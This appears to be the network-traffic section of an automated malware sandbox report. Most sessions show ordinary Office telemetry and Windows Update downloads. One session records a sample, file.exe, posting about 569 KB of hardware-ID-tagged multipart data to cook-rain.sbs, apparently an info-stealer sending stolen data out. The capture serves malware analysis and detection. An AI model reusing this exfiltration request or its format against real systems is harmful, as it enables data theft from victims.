                                                                                                                                                                      2024-11-21 05:23:28 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      25192.168.2.64973413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:28 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:28 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                                      x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052328Z-178bfbc474bwlrhlhC1NYCy3kg000000012g000000004w1k
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      26192.168.2.64973513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:28 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:28 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                      x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052328Z-1777c6cb754ww792hC1TEBzqu40000000ak0000000003d88
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:28 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      27192.168.2.64973613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:28 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:28 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 464
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                      x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052328Z-178bfbc474brk967hC1NYCfu6000000000wg000000003hs9
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:28 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      28192.168.2.64973713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:28 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:28 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                                      x-ms-request-id: 8b710333-301e-0020-767a-3b6299000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052328Z-178bfbc474b7cbwqhC1NYC8z4n00000000z0000000005zzr
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:28 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      29192.168.2.64973852.149.20.212443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b2+uAFVzyd7zfyp&MD=xvAfNsrA HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                      2024-11-21 05:23:29 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Expires: -1
                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                      MS-CorrelationId: e6f5653b-7e64-4b40-8163-8ccc0db6ce45
                                                                                                                                                                      MS-RequestId: dd2eb2b7-98cf-4751-a158-8b46acff7349
                                                                                                                                                                      MS-CV: aevpW5lGOke9PR++.0
                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:28 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                      2024-11-21 05:23:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                      2024-11-21 05:23:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      30192.168.2.649740188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:29 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=3T56YVK7A5I8
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 569559
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: 2d 2d 33 54 35 36 59 56 4b 37 41 35 49 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 36 35 43 41 37 43 42 41 39 36 36 43 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 33 54 35 36 59 56 4b 37 41 35 49 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 54 35 36 59 56 4b 37 41 35 49 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 54 35 36 59 56 4b 37
                                                                                                                                                                      Data Ascii: --3T56YVK7A5I8Content-Disposition: form-data; name="hwid"B065CA7CBA966C7B63CFCF7E6C45F838--3T56YVK7A5I8Content-Disposition: form-data; name="pid"1--3T56YVK7A5I8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3T56YVK7
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: 4d 0a bf 29 ec dc 3f b7 cb d0 c0 ec 58 57 78 4f 62 98 ff b9 9e ee 24 83 e5 ba cd a1 23 40 82 9d 69 6f fc 35 8c bb de 13 03 58 db 81 c7 aa 45 93 86 be 78 85 dd 0e 13 61 65 d7 4a bd 2b cf bf fc ee ce 85 d4 02 f8 4c 46 b3 19 70 a7 39 53 29 b5 b4 a5 e3 8d 26 31 94 33 08 9a af 8d ff ef 9b 11 02 fe ef 00 e7 08 d6 99 d0 80 08 3c 95 ff cf 2d 29 8b 72 20 05 ac 60 39 42 12 cd 70 44 c8 ec 3d 83 65 d9 6c 75 c6 cb a0 16 78 cc 76 fd b5 dd 40 2d 12 b6 14 59 e4 4d 18 69 01 9f 81 0a e7 8e 37 18 df ab 1f 04 e9 d4 28 7d 9c fb 44 bd 2e 5f 81 77 7d 9a 76 f1 e5 41 cc 70 84 2c b2 f3 01 81 c1 32 e4 7d 3c c1 4b ff a4 e4 d8 22 96 47 77 47 be 96 b3 9e ac 92 02 73 1d 84 da fe 14 52 ca 03 da 76 6e e9 ce 86 77 c1 64 f8 c0 7c 84 d2 8b ba a6 24 7b e9 a3 0b 03 68 08 85 10 b2 03 ee a6 4a
                                                                                                                                                                      Data Ascii: M)?XWxOb$#@io5XExaeJ+LFp9S)&13<-)r `9BpD=eluxv@-YMi7(}D._w}vAp,2}<K"GwGsRvnwd|${hJ
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: 32 73 26 64 aa 7a 7e 89 d2 3d 42 d9 d9 66 d6 71 98 7e f5 61 0c 53 f6 8f 1f 87 14 f9 3a 6f cb 00 c4 d6 c8 51 97 bf ab 27 3e e7 0f 07 4f 67 4c ff 75 ac 80 65 ed 92 88 b9 20 b7 8b 18 68 21 00 6e 53 34 c2 e5 11 00 17 52 17 b4 e3 e7 dd 97 7f ec 22 3c 8d fd 6a 1f 4e 39 99 5a 45 5f 57 5c ec a7 6c 75 8d 60 0e c8 ff 2c 37 5a ce 0b a1 4c 1a c2 91 c4 64 e9 ee 4a cc 54 ed c4 6b 42 7d f3 3b db da fe 2f 0e 1f 5f c9 82 b3 03 35 67 20 5a 7e 21 1f e0 ea 61 b6 be 0b 73 1e 00 c6 c7 ff fd f0 b1 43 e0 25 1c 5b 6c 83 e2 f9 5f 65 f0 33 49 a0 d8 49 cc f2 ff 6e 08 17 39 cb 6f 99 23 42 44 53 05 a0 a6 8f cd 14 7e 10 82 82 47 6d 56 63 5d 41 73 53 25 52 9b 96 5a 37 56 67 c1 46 ef 26 09 8c 49 80 80 57 47 4c ec 17 1e a9 ce 6a 7a 5c 7a 34 6e 20 46 42 53 6b 5a 4a d2 cd ef ab 4e ac 97 76
                                                                                                                                                                      Data Ascii: 2s&dz~=Bfq~aS:oQ'>OgLue h!nS4R"<jN9ZE_W\lu`,7ZLdJTkB};/_5g Z~!asC%[l_e3IIn9o#BDS~GmVc]AsS%RZ7VgF&IWGLjz\z4n FBSkZJNv
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: 9a e9 9f 3e 85 85 b8 3f 7e d0 ca db bc bb 13 f7 6f 22 90 88 94 f4 cd bb b6 ed a7 b6 a8 33 39 f9 fa 64 75 0a c1 5d 9c 7d 6e cf 9e 7d ce 80 35 49 bb 39 4e 7e a3 8b ec 50 6e 08 16 0c 60 9f 61 34 57 bb ff 35 89 40 0c 55 ef 81 a7 c6 ce 57 b5 ca 8d 4e cb 46 ee d5 6a ea 1d bd da e9 db d2 69 39 ff 88 4f 4e d3 f6 9e be 14 d7 e2 3d 23 78 78 ad cf 6c 8b 33 b6 78 46 15 e8 34 c6 3b 94 2d e7 14 12 2f fb 72 d9 03 f2 1c b2 a1 e9 bf 44 ba c0 73 ef 36 20 9c 50 6b 5b 89 3a bf b3 e2 61 94 28 bd f6 0a eb 5c 9a 3a e3 c2 d5 b9 2b f9 66 9b ae 1d b2 f1 c3 8d d7 0e 36 63 b5 e8 e2 66 0c 4e 5d b4 40 6b f6 73 6c 3b 18 bb a8 2c 68 75 2a cc 98 3b 17 fa 48 96 52 f7 d7 2c 33 83 fd f4 ed b0 93 2c c0 f9 36 65 a3 c1 93 1f 3c c2 95 13 33 4d ad ae db 04 7e 36 a7 77 ba b1 5e 2c 39 0b 81 80 f5
                                                                                                                                                                      Data Ascii: >?~o"39du]}n}5I9N~Pn`a4W5@UWNFji9ON=#xxl3xF4;-/rDs6 Pk[:a(\:+f6cfN]@ksl;,hu*;HR,3,6e<3M~6w^,9
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: d2 8e de 97 9c 59 f6 fc fd a5 1e 2b 15 cb c8 d8 41 97 42 e8 97 43 e8 39 27 ba 35 90 79 26 9e fb 5b 29 9d 8c 8a 42 51 62 7c 28 91 c9 c6 9b 12 b9 6f 9c 93 bc 8f ec a8 4f eb f4 bc 98 1e c4 73 62 66 68 89 09 50 cd 38 4e 52 67 ae 2b 38 1e 37 2f 16 48 5d e5 4c f1 b5 22 29 31 31 e0 9e a6 28 75 0a f7 7f 17 cc 4e b4 f0 74 e0 50 49 7e f6 a9 50 5e 78 a4 af 40 06 76 6f 7d c4 d6 b0 36 38 2c 8d 74 8b fc d2 40 94 ec 56 49 53 f1 59 43 ef 79 70 86 df 2b 51 c8 4e 72 1f e6 3f 0d 61 59 04 bd 5b ef ff 3b 75 ff bf 07 58 ec 3b df 84 9e 3c 86 2d 06 e9 06 20 55 6a d1 d3 6d 20 fc 20 f9 0f 99 be 73 45 17 58 85 95 74 7d 73 e0 03 02 bc b2 a3 20 35 b7 5c b6 57 70 95 5b 96 14 86 b0 70 f9 f9 cd ba 99 96 80 76 ee 51 be a8 e4 c9 7f bd b8 a7 82 63 f9 be 3e 2b 00 f6 78 6c 17 21 7f 61 e8 17
                                                                                                                                                                      Data Ascii: Y+ABC9'5y&[)BQb|(oOsbfhP8NRg+87/H]L")11(uNtPI~P^x@vo}68,t@VISYCyp+QNr?aY[;uX;<- Ujm sEXt}s 5\Wp[pvQc>+xl!a
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: 66 4e dc 33 df 24 f2 23 f6 66 7d d7 38 5f 7f 81 20 2f 4c 19 c2 31 ac c0 de 18 b9 d9 3e 1f 75 6f dc 51 6f c1 a9 e0 3b 7c 40 1f 13 1d 03 c0 a7 38 e8 51 51 ed bc 58 34 e5 ed 9d c3 c8 86 8b 24 b7 0d cb af 70 20 fb bf 01 5c f3 de 17 2e d7 2a 0e 68 8d 20 69 2b 47 11 25 a5 ec 7b b2 51 17 1d d6 3b af f3 55 2a 08 90 f4 e7 ac e5 a2 be 03 8d d1 a6 67 cf b1 db 21 53 99 0d 52 89 ed 77 0e a0 81 5c ff fd ac 4e b6 cc 6d b4 03 96 7c 8e 3b 31 b2 ef 23 b0 c5 12 e8 0a 2f 3b da 1b 48 6d e0 65 8b fa f1 31 6b e7 a8 2a ab 99 5c c6 ac f8 15 51 5d df 4d 57 77 6d b2 fb a2 82 0c 25 90 ff 14 a1 e3 74 b8 f1 c2 7b 8b 74 f3 09 43 4f d5 f8 b8 f2 90 22 76 66 4f 7d de d2 fa 96 f1 0f a7 51 c5 fd 04 34 54 31 69 d7 ae ad c7 fe 51 0a 45 f9 e1 da 68 b2 66 2a e8 7a 2d 0f 00 03 dd e8 14 be ee 7f
                                                                                                                                                                      Data Ascii: fN3$#f}8_ /L1>uoQo;|@8QQX4$p \.*h i+G%{Q;U*g!SRw\Nm|;1#/;Hme1k*\Q]MWwm%t{tCO"vfO}Q4T1iQEhf*z-
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: be 6d 6d e9 64 8a dc 1d 8e d8 ad 26 70 85 f3 5a 9f 2a 3f 95 9b b3 fb 53 72 57 2d b4 e6 8f 9c 92 d9 95 48 35 23 9d f7 f4 d8 23 c2 52 4f c3 3a de 18 4d 93 0e 6c ea 07 ec dd bf 97 0b 8a d9 35 86 56 af a0 8e bc e8 6d 5f 99 59 69 10 19 1c f6 e2 7f f2 3f d5 d2 0f 07 9a 30 c0 01 f7 64 9a 79 e4 36 10 a7 d0 6c 98 1f 1e 89 d3 95 80 a7 1c 24 75 17 8e f3 e1 c5 59 b6 42 e6 05 66 7b dd b5 f5 08 e2 3a 66 3b 4e 16 d2 5e 9d a3 b8 f2 00 c5 69 0d 51 52 ee 59 5a 97 f1 ea bf b6 9e c9 59 15 20 41 16 62 0a 4c 63 6e cb 25 d5 3f 12 dc b7 77 44 11 0b 05 6c 0a 6d d7 0f 58 e0 3c 3d d8 d7 c7 2d 3c ad a8 98 78 38 ba df f2 46 58 f5 96 c2 75 c9 48 86 ff a2 26 7b 6e 54 8b bf ee 30 2f f3 b8 c0 99 92 71 09 b2 c0 4d d2 10 cf 99 44 09 24 34 bc 95 54 fb 43 b8 d5 30 10 15 3f 85 46 ee f1 b4 2c
                                                                                                                                                                      Data Ascii: mmd&pZ*?SrW-H5##RO:Ml5Vm_Yi?0dy6l$uYBf{:f;N^iQRYZY AbLcn%?wDlmX<=-<x8FXuH&{nT0/qMD$4TC0?F,
